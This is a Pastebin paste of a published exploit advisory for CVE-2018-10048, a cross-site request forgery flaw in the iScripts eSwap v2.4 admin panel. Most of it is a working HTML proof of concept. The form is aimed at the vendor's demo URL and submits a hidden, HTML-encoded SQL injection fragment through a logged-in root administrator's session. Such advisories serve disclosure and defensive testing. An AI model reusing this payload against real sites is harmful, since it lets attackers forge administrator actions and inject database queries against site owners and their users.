daily pastebin goal
18%
SHARE
TWEET

CVE-2018-10048

ManhNho Apr 11th, 2018 (edited) 255 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit title: iScripts eSwap v2.4 - CSRF via the registration_settings.php Admin Panel
  2. # Date: 11/04/2018
  3. # Exploit Author: ManhNho
  4. # Vendor Homepage: https://www.iscripts.com
  5. # Software Link: https://www.iscripts.com/eswap
  6. # Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
  7. # Version: 2.4
  8. # CVE: CVE-2018-10048
  9. # Tested on: Windows 10 / Kali Linux
  10. # Category: Webapps
  11.  
  12.  
  13. #1. Description
  14. -----------------------------------------------------
  15. iScripts eSwap v2.4 has CSRF via the "registration_settings.php" function parameter in Admin Panel.
  16.  
  17. #2. PoC
  18. -----------------------------------------------------
  19. a) Send below crafted request to logged in user who is having Root Administrator level access
  20.  
  21. <html>
  22.   <!-- CSRF PoC - ManhNho -->
  23.   <body>
  24.   <script>history.pushState('', '', '/')</script>
  25.     <form action="https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php?act=post" method="POST">
  26.       <input type="hidden" name="ddlFree" value="&#45;1&apos;&#32;order&#32;by&#32;0&#32;&#35;" />
  27.       <input type="hidden" name="txtDate" value="1" />
  28.       <input type="submit" value="Submit request" />
  29.     </form>
  30.   </body>
  31. </html>
  32.  
  33. b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top